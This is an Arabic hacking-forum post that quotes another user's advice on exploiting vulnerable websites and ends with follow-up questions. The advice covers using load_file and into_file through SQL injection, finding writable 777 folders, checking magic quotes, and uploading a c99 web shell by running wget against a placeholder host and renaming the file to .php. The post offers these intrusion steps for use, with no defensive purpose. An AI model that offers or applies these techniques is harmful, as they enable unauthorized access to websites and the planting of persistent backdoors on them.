عدد النقاط : 10
اقتباس المشاركة الأصلية كتبت بواسطة mobdeen وعليكم السلام ورحمة الله وبركاته السؤال الاول وهو امر load_file('/')وتقوم بوضعه في الجدول المصاب فاذا ظهر لك خطأ فلا تستطيع ذلك اما اذا لم يظهر فيمكنك المتابعة بالحق واضافة ملف ثم رفع شل في الحقن وانت عندما اظهرت يوزرات المواقع هذا ليس sql وانما remote file include وبهذه تستطيع ايضا ان ترفع شل بالامر wget www.xxxx.com/c99.txt الاكسات تضع بدلها شل txt ثم تقوم بالامر mv c99.txt c99.php وبهذا رفعت شل لكن ليس في كل المواقع تقبل رفع ش (اذهب الى الدرس 8 في دورة استغلال الثغرات) السؤال الثاني انه ليس كل السكربتات المصابة وتدخل لوحة التحكم تسمح برفع شل فيها لاكن ليس كلهاا واما عن into_file فهو تكملة للامرload_file('/') وتضعه في نهاية الاستغلال وتضع الملف اللي ترفع عليه ويحب ان يكون عندك ملف عليه تصريح 777 وتستطيع معرفة ذلك عن طريق رؤية مجلد الصور والماجيك كوتس تظهره من اللود فايل كما قلت اذا ظهر خطأ فهذا مفعل اذا لم يظهر هذا اوف وبهذا تكون رفعت شلفدتك واتمنى اني افدتك اخي العزيز هل قصدك وضع wget www.xxxx.com/c99.txt في load_file('\') يعني load_file('\ wget www.xxxx.com/c99.txt) وماجاوبتني على اليوزرات ماذا استفاد منها smilies5
[motr] |||||||||||||||||||||||||||| |||||||||| الله اكبر ||||||||||||| |||||||||||||||||||||||||||| [/motr] [motr]TheGame[/motr]